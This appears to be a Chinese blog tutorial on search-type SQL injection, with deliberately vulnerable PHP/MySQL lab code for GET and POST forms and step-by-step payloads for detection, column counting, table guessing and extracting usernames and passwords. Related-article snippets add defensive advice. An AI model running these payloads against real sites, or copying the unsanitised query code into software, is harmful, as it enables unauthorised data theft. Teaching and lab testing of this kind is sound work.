SQL注入-搜索型输入

最新推荐文章于 2025-08-12 14:24:30 发布
原创 最新推荐文章于 2025-08-12 14:24:30 发布 · 1.6w 阅读 · 36 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #渗透测试

一、搜索型注入简介与原理

1)简介
一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:


其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入。


2)原理

$sql="select * from user where password like '%$pwd%' order by password";

 
这句SQL的语句就是基于用户输入的pwd在users表中找到相应的password,正常用户当然会输入例如admin,ckse等等。但是如果有人输入这样的内容呢?

'and 1=1 and '%'='


这样的话这句SQL语句就变成了这样:

select * from user where password like '%fendo'and 1=1 and '%'='%' order by password

存在SQL注入。

二、搜索型注入判断
 判断搜索型注入的方法:

1 搜索keywords‘,如果出错的话,有90%的可能性存在漏洞;

2 搜索 keywords%,如果同样出错的话,就有95%的可能性存在漏洞;

3 搜索keywords% 'and 1=1 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=1)看返回的情况

4 搜索keywords% 'and 1=2 and '%'='(这个语句的功能就相当于普通SQL注入的 and 1=2)看返回的情况

5 根据两次的返回情况来判断是不是搜索型文本框注入了



下面这几种语句都可以:

'and 1=1 and '%'='

%' and 1=1--'

%' and 1=1 and '%'='


 
 三、搜索型注入实战


1)GET型注入
 
测试源码:

    <?
    $pwd=$_GET['pwd'];
    $conn=mysql_connect("127.0.0.1","root","123");//连接mysql数据库
    if($conn){
    	echo "连接数据库成功!"; 
    }//判断连接是否成功
    echo "<br>";
    mysql_select_db('fendo',$conn);//选择连接请求为conn的数据库(fendo)
    $sql="select * from user where password like '%$pwd%' order by password"; //字符型搜索语句
    $result=mysql_query($sql);
    while($row = mysql_fetch_array($result)){ 
    	echo "用户ID:".$row['id']."<br >";
    	echo "用户名:".$row['username']."<br >";
    	echo "用户密码:".$row['password']."<br >";
    	echo "用户邮箱:".$row['email']."<br >";
    }
    mysql_close($conn); //关闭数据库连接
    echo "<hr>";
    echo "你当前执行的sql语句为:"."<br >";
    echo $sql;
    ?>


 
1.判断字段数

语句:

%' union select 1,2,3,4,...... and '%'='

 

1.jpg



还有种方法
语句:

  %' and exists (select id from user where LENGTH(username)<6 and id=1) and '%'='


把6这个数字逐次更换,直到他不报错为止。如下当它小于6时正确,说明字段数为5。
 

2.jpg




2.判断表名

语句:

%'and(select count(*)from admin)>0 and '%'='

 

3.jpg



把admin这个表名逐次更换,直到他不报错为止,就说明这个表存在。


3.猜解密码

由于这里用的就是密码,所以这里换成猜解用户名
 
 
2)POST型注入

测试源码:

<?  

//--------------------------post处理--------------------------------//  

$name=addslashes($_POST['n']);   

$pass=addslashes($_POST['p']);  

$conn = mysql_connect('127.0.0.1','root','123');   

if($conn){  

    echo "mysql连接成功";  

    echo "<hr>";    

}  

mysql_select_db('fendo',$conn);    

$sql="select * from user where username='$name' and password='$pass'";  

$result=mysql_query($sql);  

mysql_close($conn);  

while($row = mysql_fetch_array($result)){  

    echo "用户ID:".$row['id']."<br >";  

    echo "用户名:".$row['username']."<br >";  

    echo "用户密码:".$row['password']."<br >";  

}  

echo "当前执行的sql语句:".$sql;  

?>  

 

<form action="" method="POST">  

账号:<input name="n" type="text" /><br><br>  

密码:<input name="p" type="text" /><br><br>  

<input name="" type="submit" value="提交" />  

 

</form>

 

4.jpg




1.判断是否存在SQL注入

用PHP万能密码进行测试

' or 1=1#

 

5.jpg





在用户名里输入万能密码如果没报错,就说明存在SQL注入。
 
 
2.猜字段数

' order by 4#

 

6.jpg



逐次更改数字去猜,直到不报错为止。
 
 
3.猜表名

'or 1=1 union select 1,2,3,4 #

 

7.jpg



逐次累加数字,直到不报错为止。
 
 
4.猜内容
 
替换1,2,3为你想要获得的内容
 

8.jpg

'or 1=1 union select username,password,3,4 from user#


 
 
 

SQL注入——搜索型注入
zjdda的博客
05-30 7734
搜索型注入原理 语句构造
2.SQL注入-字符型
愿听风成曲
06-29 253
通过前端输入条件,传参到后端数据库的配置文件逻辑。在数据库中查询对应的kobe,根据上图对应上。编写payload语句,添加or 1=1#如图所示,所有用户信息展示出来。输入kobe查询出现id和邮箱。在搜索框中输入语句为。
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了_sql注入
m0_71746416的博客
08-12 1072
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
fendo
02-26 1万+
一、搜索型注入简介与原理 1)简介 一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在: 2)原理 $sql="select * from user where password like '%$pwd%' order by pa
SQL注入搜索型注入
07-22 2922
SQL语句selectusername,idfromadminwhereusernamelike'%$name%'"%"匹配任何字符,"like"的意思就是像,"$"变量。正常回显,却无法判断字段数,也无法查看报错位。数据库表的信息(blog,heroes,movies,进入靶场后出现此界面,在登录界面输入。8页面显示不正常,发现最大正常位是。数据库列的信息id,num,判断一下是数字型还是字符型。账号密码错误或用户未注册!搜索框内输入a正常回显。...
SQL注入搜索型盲注(手工注入
07-22 1498
看看有没有注入点,页面异常。也尝试了其他手工注入的方法,仍然异常。判断一下是数字型还是字符型,页面异常。6页面显示不正常,发现最大正常位是5。,我们在搜索框中发现注入点。搜索框内输入a正常回显。进入靶场后出现此界面,在。用户名输入1’,密码任意。数据库列的信息id,...
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3770
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
sql注入-不同数据类型注入
xiaoheizi的博客
06-28 412
原因是程序员为了防止SQL注入,就会调用几种转义函数,将单引号或双引号进行转义操作,转义无非便是在单或双引号前加上斜杠(\)进行转义 ,但这样并非安全,因为数据库使用的是宽字节编码,两个连在一起的字符会被当做是一个汉字,而在PHP使用的UTF8编码则认为是两个独立的字符,如果我们在单或双引号前添加一个字符,使其和斜杠(\)组合被当作一个汉字,从而保留单或双引号,使其发挥应有的作用。可以发现就算闭合了【''】依然无法注入成功,是因为我们输入的【'】被在前加上斜杠(\)进行了转义,无法发挥作用。
SQL注入-Pikachu靶场通关_pikachu靶场通关sql
2401_87034306的博客
09-12 617
接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为其他类型的闭合方式,接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致,区别就是类型不同,本题为字符型,单引号闭合,其他注入语句和以上一致。接下来的步骤判断字段的个数,看回显点,爆库,爆表,爆字段,都和以上的数字型注入一致(注入sql语句也大体一致),区别就是类型不同,本题为搜索型,其他的爆库爆表爆字段内容的sql语句以上注册时注入的一致。
SQL注入-靶场通关 Less 1-21
weixin_72104324的博客
07-03 1302
打开Burp工具--打开内嵌浏览器--进入靶场第六关--打开拦截--输入?id=1',如果是正确的,说明不存在注入点,如果错误,说明存在注入点,这里是错误的,需要加上注释--+,在回车看结果是正确的,说明找到了注入点。工具,打开内嵌浏览器,打开拦截,输入http://127.0.0.1/sqli-labs-master/Less-9,然后发送到。id=1'--+,后面都注释了,单引号不闭合,报错说明是数字型SQL注入。设置休眠时间为10s,如果执行SQL语句就会加载,说明正确,存在注入点。
SQL注入 (中级篇)搜索形注入
weixin_41472455的博客
05-06 808
搜索形注入: 其实对于初学SQL注入,并不需要区分注入类型。 但是要理解搜索形注入,首先需要理解SQL搜索型语句,举个例子 我们希望从 "Persons" 表中选取居住在包含 "lon" 的城市里的人: 我们可以使用下面的 SELECT 语句: SELECT * FROM Persons WHERE City LIKE '%lon%' 通常来讲 SQL注入只是后台的 数据库查询语...
3.SQL注入-搜索型
愿听风成曲
06-30 362
将payload输入搜索框会发现所有用户信息已出现。通过以上猜测进行构造payload语句。通过上图搜索可以猜测的sql语句为。输入k字段进行搜索发现出用户信息。后台代理逻辑,通过前端传入参数。
搜索框注入
热门推荐
cnbird's blog
07-16 2万+
如果没有说错的话,在国内应该是lake2最早提出搜索型文本框注入的。这个问题我也是最近才搞明白的,因为上网时间少,工作又比较忙,所以很少时间来学习。以前很傻以为搜索型注入就是直接在文本框中输入and 1=1 和and 1=2,结果每次都是出现同样的页面,说是什么没有找到你搜索的关键词,汗啊 曾经有个人就说过,中国的黑客满地都是啊;而且有一项调查显示,中国有超过50%的大学生想成为黑客,这也许就是
mysql搜索型注入_SQL注入系列之PHP+Mysql手动注入(三)----搜索型(POST/GET)
weixin_39668965的博客
01-19 321
一、搜索型注入简介与原理1)简介一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在:其中又分为POST/GET,GET型的一般是用在网站上的搜索,而POST则用在用户名的登录,可以从form表单的method="get"属性来区分是get还是post。搜索型注入又称为文本框注入...
SQL注入—搜索注入
Ethan024的博客
03-23 528
SQL注入—搜索注入(本文仅供学习或参考) 实验准备: 皮卡丘靶场—SQL Injection—搜索型注入 实验步骤: 输入任意字母,以‘k’为例,进行模糊查询,查看结果: 猜想数据库查询语句: select * from table where username like ‘%k%’ ; 构造payload,制造闭合:k%’ or 1=1 # ...
搜索型注入
Coisini的博客
05-26 1849
1判断: 关键字%’ and 1=1 and ‘%’=’ 返回正常 关键字%’ and 1=2 and ‘%’=’ 返回错误 %25%25%25%27%09and%091=1%23 %09代替空格法 2找出keyword post方式得抓抱:(变量放在最后面,就可以直接放工具跑) http://zhaojiu.jxau.edu.cn/Web_News/Search.asp?style=3&...
搜索型sql注入
最新发布
09-05
搜索型 SQL 注入作为 SQL 注入的一种类型,核心原理是攻击者利用应用程序在处理用户搜索输入时的漏洞,通过输入恶意 SQL 代码来改变原有的 SQL 查询逻辑。当应用程序直接将未经处理的用户搜索输入嵌入到 SQL 查询中时,攻击者就能达成其恶意目的。例如,在一个搜索功能中,原本的 SQL 查询为 `SELECT * FROM products WHERE name = '用户输入的搜索词'`,若攻击者输入 `' OR 1=1 --`,那么查询就会变为 `SELECT * FROM products WHERE name = '' OR 1=1 --'`,`1=1` 恒为真,`--` 是 SQL 中的注释符号,会将后面的内容注释掉,这样攻击者就能绕过正常的搜索条件,获取所有产品信息 [^2]。 其危害主要体现在数据泄露方面。攻击者可以利用搜索型 SQL 注入获取数据库中的敏感信息,如用户的账号、密码、个人资料等。这不仅会对用户的隐私造成严重威胁,还可能导致企业面临法律风险和声誉损失。此外,攻击者还可能通过注入代码修改或删除数据库中的数据,破坏数据的完整性和可用性,影响企业的正常运营 [^2]。 防范搜索型 SQL 注入可以采用以下方法: - **使用预编译语句(PreparedStatement)**:预编译语句会对 SQL 语句的结构和参数进行分离处理。当执行查询时,数据库会对 SQL 语句进行预编译,之后再将用户输入的参数作为独立的数据进行处理,这样就能有效防止恶意代码改变 SQL 查询的逻辑。例如在 Java 中使用 `PreparedStatement` 的示例代码如下: ```java import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; public class PreparedStatementExample { public static void main(String[] args) { String url = "jdbc:mysql://localhost:3306/mydb"; String user = "root"; String password = "password"; try (Connection conn = DriverManager.getConnection(url, user, password)) { String sql = "SELECT * FROM products WHERE name = ?"; PreparedStatement pstmt = conn.prepareStatement(sql); pstmt.setString(1, "用户输入的搜索词"); ResultSet rs = pstmt.executeQuery(); while (rs.next()) { // 处理查询结果 } } catch (SQLException e) { e.printStackTrace(); } } } ``` - **输入验证和过滤**:对用户输入进行严格的验证和过滤,只允许合法的字符和格式。例如,限制输入的长度、检查输入是否包含特殊字符等。可以使用正则表达式来进行输入验证,示例代码如下: ```python import re def is_valid_input(input_str): pattern = re.compile(r'^[a-zA-Z0-9\s]+$') return pattern.match(input_str) is not None search_input = "用户输入的搜索词" if is_valid_input(search_input): # 执行搜索操作 pass else: # 提示输入不合法 pass ``` - **最小化数据库权限**:为数据库用户分配最小的必要权限,避免使用具有高权限的账号来执行应用程序的数据库操作。这样即使攻击者成功注入 SQL 代码,由于权限限制,也无法对数据库造成严重的破坏。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值